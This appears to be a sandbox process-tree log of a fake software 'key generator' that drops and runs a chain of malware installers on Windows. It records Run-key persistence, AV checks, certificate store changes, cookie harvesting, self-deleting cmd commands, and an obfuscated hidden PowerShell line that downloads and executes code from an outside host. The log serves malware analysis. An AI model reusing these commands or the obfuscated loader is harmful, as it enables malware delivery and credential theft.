C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6060 /prefetch:82⤵PID:4460
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5928 /prefetch:82⤵PID:4572
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5488 /prefetch:82⤵PID:4592
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5544 /prefetch:82⤵PID:4636
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5992 /prefetch:82⤵PID:4728
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5400 /prefetch:82⤵PID:4656
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4932 /prefetch:82⤵PID:4624
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:12⤵PID:4744
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5964 /prefetch:82⤵PID:4872
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6196 /prefetch:82⤵PID:4892
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6312 /prefetch:82⤵PID:4976
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6480 /prefetch:82⤵PID:5088
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6600 /prefetch:82⤵PID:4232
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6728 /prefetch:82⤵PID:4900
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6852 /prefetch:82⤵PID:4936
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6888 /prefetch:82⤵PID:4244
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6984 /prefetch:12⤵PID:5024
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7252 /prefetch:82⤵PID:1356
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7100 /prefetch:82⤵PID:4216
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7680 /prefetch:82⤵PID:4568
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7808 /prefetch:82⤵PID:1736
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7812 /prefetch:12⤵PID:4660
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7964 /prefetch:82⤵PID:4648
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8112 /prefetch:82⤵PID:5012
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8384 /prefetch:82⤵PID:4884
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8404 /prefetch:82⤵PID:4164
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=8528 /prefetch:82⤵PID:4160
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3464 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4408
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7812 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4600
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4340 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4760
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1728,4687959196928479222,14869384679675895559,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4928
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2616
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2428
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2404
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2248
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1844
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1404
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1224
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1104
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:1032 -
C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exeC:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe2⤵
- Suspicious use of SetThreadContext
PID:584 -
C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe"C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe"3⤵PID:5468
C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exeC:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe2⤵
- Suspicious use of SetThreadContext
PID:8912 -
C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe"C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe"3⤵PID:10572
C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exeC:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe2⤵
- Suspicious use of SetThreadContext
PID:4024 -
C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe"C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe"3⤵PID:10428
C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exeC:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe2⤵PID:9196
C:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exeC:\Users\Admin\AppData\Roaming\Mxmetamux\libmfxsw32.exe2⤵PID:10268
C:\Users\Admin\AppData\Local\8065b13e-c302-4ea8-9d27-9b2555360c2b\9C8.exeC:\Users\Admin\AppData\Local\8065b13e-c302-4ea8-9d27-9b2555360c2b\9C8.exe --Task2⤵PID:9884
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3644 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
PID:4968
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4696
C:\Users\Admin\AppData\Local\Temp\Temp2_Wondershare.Dr.fone.For.5.5.0.key.generator.zip\Wondershare.Dr.fone.For.5.5.0.key.generator.exe"C:\Users\Admin\AppData\Local\Temp\Temp2_Wondershare.Dr.fone.For.5.5.0.key.generator.zip\Wondershare.Dr.fone.For.5.5.0.key.generator.exe"1⤵PID:5008
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵PID:4724
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
PID:5072 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
PID:4836 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:4860
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:4492
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exekeygen-step-2.exe3⤵
- Executes dropped EXE
- Modifies system certificate store
PID:3732 -
C:\Users\Admin\AppData\Roaming\59E.tmp.exe"C:\Users\Admin\AppData\Roaming\59E.tmp.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2328 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\59E.tmp.exe"5⤵PID:6048
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK6⤵
- Delays execution with timeout.exe
PID:6572
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL4⤵PID:5028
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- Runs ping.exe
PID:496
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
PID:3988 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵PID:2352
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:2640
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Checks computer location settings
PID:2096 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2608 -
C:\Users\Admin\AppData\Local\Temp\SE6WNMAAYG\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\SE6WNMAAYG\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5100 -
C:\Users\Admin\AppData\Local\Temp\SE6WNMAAYG\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\SE6WNMAAYG\multitimer.exe" 1 3.1617987546.607087da3fb62 1016⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1400 -
C:\Users\Admin\AppData\Local\Temp\SE6WNMAAYG\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\SE6WNMAAYG\multitimer.exe" 2 3.1617987546.607087da3fb627⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
PID:3152 -
C:\Users\Admin\AppData\Local\Temp\rgfmy05vre5\mt1fu32iu4k.exe"C:\Users\Admin\AppData\Local\Temp\rgfmy05vre5\mt1fu32iu4k.exe" /VERYSILENT8⤵
- Executes dropped EXE
PID:4816 -
C:\Users\Admin\AppData\Local\Temp\is-E03SM.tmp\mt1fu32iu4k.tmp"C:\Users\Admin\AppData\Local\Temp\is-E03SM.tmp\mt1fu32iu4k.tmp" /SL5="$803B0,140785,56832,C:\Users\Admin\AppData\Local\Temp\rgfmy05vre5\mt1fu32iu4k.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:1488 -
C:\Users\Admin\AppData\Local\Temp\is-BGO43.tmp\apipostback.exe"C:\Users\Admin\AppData\Local\Temp\is-BGO43.tmp\apipostback.exe" adan adan10⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5344 -
C:\Windows\SysWOW64\cmd.execmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\X8AVSnMKi.dll"11⤵PID:6560
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Users\Admin\AppData\Local\Temp\X8AVSnMKi.dll"12⤵PID:6812
C:\Windows\system32\regsvr32.exe/s "C:\Users\Admin\AppData\Local\Temp\X8AVSnMKi.dll"13⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:6832
C:\Windows\SysWOW64\cmd.execmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\X8AVSnMKi.dllkWQZGC5bM.dll"11⤵PID:7000
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Users\Admin\AppData\Local\Temp\X8AVSnMKi.dllkWQZGC5bM.dll"12⤵PID:6996
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵PID:5400
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵
- Blocklisted process makes network request
PID:5364
C:\Users\Admin\AppData\Local\Temp\rmsgqo3cqri\ywjzhunjyey.exe"C:\Users\Admin\AppData\Local\Temp\rmsgqo3cqri\ywjzhunjyey.exe" /ustwo INSTALL8⤵
- Executes dropped EXE
PID:2476 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "ywjzhunjyey.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\rmsgqo3cqri\ywjzhunjyey.exe" & exit9⤵PID:7156
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Executes dropped EXE
PID:5288
C:\Windows\SysWOW64\taskkill.exetaskkill /im "ywjzhunjyey.exe" /f10⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Kills process with taskkill
PID:5524
C:\Users\Admin\AppData\Local\Temp\sdefmc0uvrn\KiffApp1.exe"C:\Users\Admin\AppData\Local\Temp\sdefmc0uvrn\KiffApp1.exe"8⤵
- Executes dropped EXE
PID:5140
C:\Users\Admin\AppData\Local\Temp\slzzpl2izqr\vpn.exe"C:\Users\Admin\AppData\Local\Temp\slzzpl2izqr\vpn.exe" /silent /subid=4828⤵
- Executes dropped EXE
PID:5188 -
C:\Users\Admin\AppData\Local\Temp\is-UOTLF.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-UOTLF.tmp\vpn.tmp" /SL5="$303CE,15170975,270336,C:\Users\Admin\AppData\Local\Temp\slzzpl2izqr\vpn.exe" /silent /subid=4829⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:5228 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵PID:6072
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵PID:5524
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵PID:5104
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵PID:7036
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵PID:8140
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install10⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7848
C:\Users\Admin\AppData\Local\Temp\su4x1srlkmx\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\su4x1srlkmx\Setup3310.exe" /Verysilent /subid=5778⤵PID:5220
C:\Users\Admin\AppData\Local\Temp\is-I57U4.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-I57U4.tmp\Setup3310.tmp" /SL5="$303E0,138429,56832,C:\Users\Admin\AppData\Local\Temp\su4x1srlkmx\Setup3310.exe" /Verysilent /subid=5779⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5300 -
C:\Users\Admin\AppData\Local\Temp\is-EGM5D.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-EGM5D.tmp\Setup.exe" /Verysilent10⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:6352 -
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe"11⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6460 -
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe"12⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:6528 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit13⤵PID:2740
C:\Windows\SysWOW64\taskkill.exetaskkill /im RunWW.exe /f14⤵
- Kills process with taskkill
PID:5588
C:\Windows\SysWOW64\timeout.exetimeout /t 614⤵
- Delays execution with timeout.exe
PID:3444
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe"11⤵
- Executes dropped EXE
- Adds Run key to start application
PID:6452 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Executes dropped EXE
PID:7060
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Executes dropped EXE
PID:504
C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Three.exe"C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\Three.exe"11⤵
- Executes dropped EXE
PID:6500 -
C:\Users\Admin\AppData\Local\Temp\T7P6G3LPC4\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\T7P6G3LPC4\multitimer.exe" 0 306065bb10421b26.04333812 0 10312⤵PID:5180
C:\Users\Admin\AppData\Local\Temp\T7P6G3LPC4\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\T7P6G3LPC4\multitimer.exe" 1 3.1617987577.607087f9defe7 10313⤵
- Executes dropped EXE
- Adds Run key to start application
PID:7024 -
C:\Users\Admin\AppData\Local\Temp\T7P6G3LPC4\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\T7P6G3LPC4\multitimer.exe" 2 3.1617987577.607087f9defe714⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
PID:6596 -
C:\Users\Admin\AppData\Local\Temp\ab2nmlwydjz\app.exe"C:\Users\Admin\AppData\Local\Temp\ab2nmlwydjz\app.exe" /8-2315⤵PID:6228
C:\Users\Admin\AppData\Local\Temp\ab2nmlwydjz\app.exe"C:\Users\Admin\AppData\Local\Temp\ab2nmlwydjz\app.exe" /8-2316⤵
- Modifies data under HKEY_USERS
PID:6244
C:\Users\Admin\AppData\Local\Temp\jgvwdthk4kv\vpn.exe"C:\Users\Admin\AppData\Local\Temp\jgvwdthk4kv\vpn.exe" /silent /subid=48215⤵PID:7568
C:\Users\Admin\AppData\Local\Temp\is-G7IJU.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-G7IJU.tmp\vpn.tmp" /SL5="$20450,15170975,270336,C:\Users\Admin\AppData\Local\Temp\jgvwdthk4kv\vpn.exe" /silent /subid=48216⤵
- Loads dropped DLL
PID:6888
C:\Users\Admin\AppData\Local\Temp\ewgokxha0n0\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\ewgokxha0n0\Setup3310.exe" /Verysilent /subid=57715⤵PID:7476
C:\Users\Admin\AppData\Local\Temp\is-KCIEU.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-KCIEU.tmp\Setup3310.tmp" /SL5="$20334,138429,56832,C:\Users\Admin\AppData\Local\Temp\ewgokxha0n0\Setup3310.exe" /Verysilent /subid=57716⤵
- Loads dropped DLL
PID:6940 -
C:\Users\Admin\AppData\Local\Temp\is-PEC0D.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-PEC0D.tmp\Setup.exe" /Verysilent17⤵PID:7964
C:\Users\Admin\AppData\Local\Temp\ramn2v1ksq1\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\ramn2v1ksq1\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq15⤵PID:7192
C:\Users\Admin\AppData\Local\Temp\is-AK6D6.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-AK6D6.tmp\IBInstaller_97039.tmp" /SL5="$B03A8,9978391,721408,C:\Users\Admin\AppData\Local\Temp\ramn2v1ksq1\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq16⤵PID:7036
C:\Users\Admin\AppData\Local\Temp\is-OQRG0.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-OQRG0.tmp\{app}\vdi_compiler"17⤵PID:2128
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-OQRG0.tmp\{app}\vdi_compiler.exe"18⤵PID:4772
C:\Windows\SysWOW64\PING.EXEping localhost -n 419⤵
- Runs ping.exe
PID:7660
